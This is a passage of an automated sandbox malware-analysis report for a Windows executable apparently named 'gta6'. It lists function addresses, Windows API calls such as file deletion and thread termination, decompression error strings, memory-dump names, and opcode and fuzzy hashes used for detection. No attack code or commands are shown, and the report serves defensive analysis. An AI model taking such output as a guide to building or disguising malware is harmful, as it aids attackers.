RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8

Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187

Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
Part of subcall function 000000014000720C: RtlEnterCriticalSection.NTDLL ref: 0000000140007230

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
String ID:
API String ID: 547990026-0
Opcode ID: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
Instruction ID: 7a41e47de86a43ff34abb2becfbad555fd020f9bfb046cc2ed969e3c0c855493
Opcode Fuzzy Hash: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
Instruction Fuzzy Hash: 0F01FFF5509B01E5F923BB63BC02BDA6B61E74E3E0F409405BB89131B3DE3DD9849610

Function 00000001400122F0 Relevance: 3.0, APIs: 2, Instructions: 25memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 000000014001230B
RtlAllocateHeap.NTDLL ref: 000000014001232C

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: AllocateHeapwcslen
String ID:
API String ID: 1345907364-0
Opcode ID: a0dc15986e3017cd2ed62ee5ac775f964501f34d63cb4b3c8d7d12bb2f12bec3
Instruction ID: cbd8129a4029e1d9ec6fd495d0fb7d522f2e550c82e6ba5ffb2ff9068418f6bb
Opcode Fuzzy Hash: a0dc15986e3017cd2ed62ee5ac775f964501f34d63cb4b3c8d7d12bb2f12bec3
Instruction Fuzzy Hash: B7F09276608A8086D621DB5AE45139AA7B0F7C9BC4F504125EBDC87B69DF3EC9518A00

Function 000000014000DA6C Relevance: 3.0, APIs: 2, Instructions: 19fileCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32 ref: 000000014000DA8C
DeleteFileW.KERNEL32 ref: 000000014000DA95

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222

Function 0000000140012060 Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32 ref: 000000014001206E
TlsAlloc.KERNEL32 ref: 000000014001207B

Part of subcall function 0000000140012C50: RtlAllocateHeap.NTDLL ref: 0000000140012C63
Part of subcall function 0000000140012C50: RtlAllocateHeap.NTDLL ref: 0000000140012C7D
Part of subcall function 0000000140012C50: TlsSetValue.KERNEL32 ref: 0000000140012CB0

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: Heap$Allocate$AllocCreateValue
String ID:
API String ID: 3361498153-0
Opcode ID: 1b0d72df29ce6564ac22208b59af7006679a658f7d576f5e4767aae600ecf03e
Instruction ID: 1c20f48a7e0d63c5f07c3edeff385a7070e23dcbb2ee76a36a736f2f2e91a8b3
Opcode Fuzzy Hash: 1b0d72df29ce6564ac22208b59af7006679a658f7d576f5e4767aae600ecf03e
Instruction Fuzzy Hash: F9D0C939A1175092E746AB72A81A3E922A0F75C3C1F901419B70947771DF7E81965A40

Function 00000001400120A0 Relevance: 3.0, APIs: 2, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

HeapDestroy.KERNEL32 ref: 00000001400120AB
TlsFree.KERNEL32 ref: 00000001400120B7

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: DestroyFreeHeap
String ID:
API String ID: 3293292866-0
Opcode ID: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
Instruction ID: 71a10d3d5b3131d437c50284ad1bfb95f0c128dd24e11de8e9b8b88d768efc2d
Opcode Fuzzy Hash: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
Instruction Fuzzy Hash: 4CC04C34611400D2E606EB13EC953A42362B79C7C5F801414E70E1B671CE394955E700

Function 000000014000DD30 Relevance: 2.5, APIs: 2, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 000000014000DD88
CloseHandle.KERNEL32 ref: 000000014000DD91

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: CloseFreeHandleHeap
String ID:
API String ID: 1642312469-0
Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740

Function 000000014000DDC0 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000000014000DDED

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10

Function 0000000140010FFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

TlsFree.KERNEL32 ref: 0000000140011019

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: Free
String ID:
API String ID: 3978063606-0
Opcode ID: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
Instruction ID: 3be53cbf4efc602c07d04e61f546686734bccd281855bf9d316eb8d3f4bb89d6
Opcode Fuzzy Hash: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
Instruction Fuzzy Hash: E3D0E97091558096F66BA747EC857E422A2B7AC3C5F500419E3050B1B28ABE49DDEA15

Function 000000014000DC88 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNEL32 ref: 000000014000DC91

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530

Function 000000014000C6B0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

RtlRemoveVectoredExceptionHandler.NTDLL ref: 000000014000C6C0

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: ExceptionHandlerRemoveVectored
String ID:
API String ID: 1340492425-0
Opcode ID: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
Instruction ID: 43e8ab96d0ef540813763e0684213002212cef3b8ee59004a75f8fb70944dace
Opcode Fuzzy Hash: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
Instruction Fuzzy Hash: 30C08C78B03B0085FA4AEB03B8883A422606B8C7C1F800008E60E037328E3C04A54780

Non-executed Functions

Function 000000014000B758 Relevance: 72.0, APIs: 35, Strings: 6, Instructions: 272windowmemoryregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000B5D8: wcslen.MSVCRT ref: 000000014000B5EA
Part of subcall function 000000014000B5D8: RtlAllocateHeap.NTDLL ref: 000000014000B600

GetStockObject.GDI32 ref: 000000014000B7B6
LoadIconW.USER32 ref: 000000014000B7F2
LoadCursorW.USER32 ref: 000000014000B803
RegisterClassExW.USER32 ref: 000000014000B82D
IsWindowEnabled.USER32 ref: 000000014000B859
EnableWindow.USER32 ref: 000000014000B86C
GetSystemMetrics.USER32 ref: 000000014000B88B
GetSystemMetrics.USER32 ref: 000000014000B89B
CreateWindowExW.USER32 ref: 000000014000B8F0
SetWindowLongPtrW.USER32 ref: 000000014000B90E
CreateWindowExW.USER32 ref: 000000014000B95E
SendMessageW.USER32 ref: 000000014000B97C
CreateWindowExW.USER32 ref: 000000014000B9D9
SendMessageW.USER32 ref: 000000014000B9FA
SetFocus.USER32 ref: 000000014000BA07
SendMessageW.USER32 ref: 000000014000BA22
wcslen.MSVCRT ref: 000000014000BA2B
wcslen.MSVCRT ref: 000000014000BA36
SendMessageW.USER32 ref: 000000014000BA4D
CreateWindowExW.USER32 ref: 000000014000BAA9
SendMessageW.USER32 ref: 000000014000BAC8
CreateAcceleratorTableW.USER32 ref: 000000014000BAED
SetForegroundWindow.USER32 ref: 000000014000BAF9
BringWindowToTop.USER32 ref: 000000014000BB02
GetMessageW.USER32 ref: 000000014000BB16
TranslateAcceleratorW.USER32 ref: 000000014000BB2A
TranslateMessage.USER32 ref: 000000014000BB38
DispatchMessageW.USER32 ref: 000000014000BB42
DestroyAcceleratorTable.USER32 ref: 000000014000BB59
wcslen.MSVCRT ref: 000000014000BB68
wcscpy.MSVCRT ref: 000000014000BB7E
HeapFree.KERNEL32 ref: 000000014000BB90
HeapFree.KERNEL32 ref: 000000014000BBB5
HeapFree.KERNEL32 ref: 000000014000BBCC
HeapFree.KERNEL32 ref: 000000014000BBE3

Strings

STATIC, xrefs: 000000014000B944
BUTTON, xrefs: 000000014000BA8A
EDIT, xrefs: 000000014000B9BF
P, xrefs: 000000014000BA7B
n, xrefs: 000000014000BAA1
C, xrefs: 000000014000BA99

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocateBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
String ID: BUTTON$C$EDIT$P$STATIC$n
API String ID: 1420713935-1690119102
Opcode ID: 002200ebb1e1213bc04a13eb1c4ef8fb9e0871078b3e41863b1eb0bca815023c
Instruction ID: 503d67efbf07ff6f248b06a67c50be69490569a40db1ce31eb7df8f18fb995d6
Opcode Fuzzy Hash: 002200ebb1e1213bc04a13eb1c4ef8fb9e0871078b3e41863b1eb0bca815023c
Instruction Fuzzy Hash: 59D134B5605B4086EB12DB62F8447AA77A5FB8CBC8F404129AF4A47B79DF7DC4498B00

Function 000000014000B64C Relevance: 12.1, APIs: 8, Instructions: 56nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL ref: 000000014000B674
EnableWindow.USER32 ref: 000000014000B6F6
DestroyWindow.USER32 ref: 000000014000B706
UnregisterClassW.USER32 ref: 000000014000B71C

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: Window$ClassDestroyEnableNtdllProc_Unregister
String ID:
API String ID: 1396861415-0
Opcode ID: fc5dfa83332df02ed0060d8fb174e8f27900349cc90facb9f358c39e73375a0a
Instruction ID: a4636e2d5cbf899b35d7322a6c98c02ffc5b8df7e19630505cb7187d8542c3a3
Opcode Fuzzy Hash: fc5dfa83332df02ed0060d8fb174e8f27900349cc90facb9f358c39e73375a0a
Instruction Fuzzy Hash: 4A210BB4204A5182FB56DB27F8483B923A1E78CBC1F549026FB4A4B7B5DF3DC8859700

Function 00000001400138E5 Relevance: 12.0, Strings: 9, Instructions: 745COMMON

Download Yara Rule

Strings

invalid distance too far back, xrefs: 000000014001428E
invalid code lengths set, xrefs: 0000000140013A63
invalid literal/lengths set, xrefs: 0000000140013D60
invalid literal/length code, xrefs: 0000000140013FF6
invalid distances set, xrefs: 0000000140013DCC
invalid bit length repeat, xrefs: 0000000140013CFB
too many length or distance symbols, xrefs: 0000000140013A7B
invalid distance code, xrefs: 00000001400141DA
invalid code -- missing end-of-block, xrefs: 0000000140013CE3

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 022d8aec80773364c7782894b492e5bf51f6f0f1ab81dba49e519fa5dfe17589
Instruction ID: 63a129330255db97eb1aabb126bfc5b4551e8f686405ea2d62c327762663274b
Opcode Fuzzy Hash: 022d8aec80773364c7782894b492e5bf51f6f0f1ab81dba49e519fa5dfe17589
Instruction Fuzzy Hash: FB620572A106A48BE799CF25D498BED3BF9F748780F518129FB468B7A0E739C845C740

Function 0000000140013175 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 399COMMON

Download Yara Rule

Strings

unknown compression method, xrefs: 00000001400130C8
unknown header flags set, xrefs: 00000001400131B7
, xrefs: 000000014001324B
header crc mismatch, xrefs: 00000001400135F1

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown compression method$unknown header flags set
API String ID: 0-4074041902
Opcode ID: 678d21ef58d4a875124531cd8bb27c6309f94b37c07dc777e5a796b3eb271508
Instruction ID: 440100e0ad3e42c115cce95f3fb78f0a990aae4413b5501bd8dd5ba0711be261
Opcode Fuzzy Hash: 678d21ef58d4a875124531cd8bb27c6309f94b37c07dc777e5a796b3eb271508
Instruction Fuzzy Hash: 7A02B1726007949BEBA78F16C488BAE3BE9FB4CB94F164518EF894B7A0D775C940C740

Function 0000000140016210 Relevance: 4.1, Strings: 3, Instructions: 372COMMON

Download Yara Rule

Strings

invalid distance too far back, xrefs: 0000000140016697
invalid literal/length code, xrefs: 0000000140016663
invalid distance code, xrefs: 0000000140016679

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID:
String ID: invalid distance code$invalid distance too far back$invalid literal/length code
API String ID: 0-3255898291
Opcode ID: b59c351ebb6019647229452a56868728e5b182fd303493ccc03160f08c7a3aa8
Instruction ID: 3f1348f65b8f8bda14ba5cdfa7bf6f02fc8c4dbb68883e69d1ec2b1899c7470d
Opcode Fuzzy Hash: b59c351ebb6019647229452a56868728e5b182fd303493ccc03160f08c7a3aa8
Instruction Fuzzy Hash: C5D138326186D08BD71A8F3AD8447BD7FA1F3993C4F54811AEB968B791D63DCA4AC700

Function 0000000140012FDD Relevance: 4.0, Strings: 3, Instructions: 217COMMON

Download Yara Rule

Strings

unknown compression method, xrefs: 00000001400130C8
invalid window size, xrefs: 0000000140013145
incorrect header check, xrefs: 000000014001315D

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size$unknown compression method
API String ID: 0-1186847913
Opcode ID: e5d9ef9cb6cfd683bb0b87efb43f2fbb65f2835d92bd1581f31df26c1c39ce5d
Instruction ID: c7f0437dc46e56fef3014f932af091831cb3ca76e565b5a088b3fef6b265a946
Opcode Fuzzy Hash: e5d9ef9cb6cfd683bb0b87efb43f2fbb65f2835d92bd1581f31df26c1c39ce5d
Instruction Fuzzy Hash: 9391A2726106949BFBA6CF26C584B9E3BA9F70C794F114229EB464BBE1C736D950CB00

Function 000000014001366E Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

, xrefs: 000000014001366E
, xrefs: 000000014001368E
invalid block type, xrefs: 000000014001377B

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID:
String ID: $ $invalid block type
API String ID: 0-2056396358
Opcode ID: 44e2e5f460598a6c66844f3403f38ee68ad68f3f2a55e5b147868c764788a378
Instruction ID: 6826abb0ae9e935998ffe99ae2e08a78a36fe9b187ecd4f73c4f7ab9da41e151
Opcode Fuzzy Hash: 44e2e5f460598a6c66844f3403f38ee68ad68f3f2a55e5b147868c764788a378
Instruction Fuzzy Hash: 7161E3B3510B949BE766CF26C8887AD3BE8F708394F554229EB558B7E0D73AC490CB40

Function 000000014000EA48 Relevance: 2.8, APIs: 1, Instructions: 1540COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 000000014000EA7A

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 1b03f7ef480ea5865ac2d9ef79243ddcad7e3d9da8d43d155ca602e5c9a73022
Instruction ID: c8f745e53e58f4d3ff63e30af0f782c513ee99f48fb140b821e661274e727f8d
Opcode Fuzzy Hash: 1b03f7ef480ea5865ac2d9ef79243ddcad7e3d9da8d43d155ca602e5c9a73022
Instruction Fuzzy Hash: 1DC291B3A282408BD368CF69E85665BB7A1F7D8748F45A029FB87D3B44D63CD9018F44

Function 0000000140010210 Relevance: .7, Instructions: 676COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68354d835f18592a3392b19952e0fe910a5dfe6a9023353f29145046c6faf481
Instruction ID: 022ba38ea2fc746ee1b0595bfd7f682d53a7df84c20089d95d53e5e85305b389
Opcode Fuzzy Hash: 68354d835f18592a3392b19952e0fe910a5dfe6a9023353f29145046c6faf481
Instruction Fuzzy Hash: E32283B7F744204BD71DCB69EC52FE836A2B75434C709A02CAA17D3F44EA3DEA158A44

Function 0000000140015170 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 503b61509a6e7d9b6eb4f9c1519d37c0dc2229192933667b3bc723eba56df74c
Instruction ID: f294bca1e54ba5f97cd1887ffa6c8c7d976b4678fb34f7ffe8470b0002a4fcc7
Opcode Fuzzy Hash: 503b61509a6e7d9b6eb4f9c1519d37c0dc2229192933667b3bc723eba56df74c
Instruction Fuzzy Hash: 7B8150733301749BE7668A2EA514BE93290F3693CEFC56115FB8487B45CA3EB921CB50

Function 0000000140015160 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b12c9a6a7ee3862a54880f18472b54e1903d2b01c5643e5ee2caa8c01718eea
Instruction ID: e67d2bfc1a2697f1f60af7736c02a9787f64ff3490f4c327f028a03746ec3e44
Opcode Fuzzy Hash: 6b12c9a6a7ee3862a54880f18472b54e1903d2b01c5643e5ee2caa8c01718eea
Instruction Fuzzy Hash: FE715CB23301749BEB658B2E9514BE93390F36A349FC56105EB855BB81CE3EB921CF50

Function 00000001400154F0 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
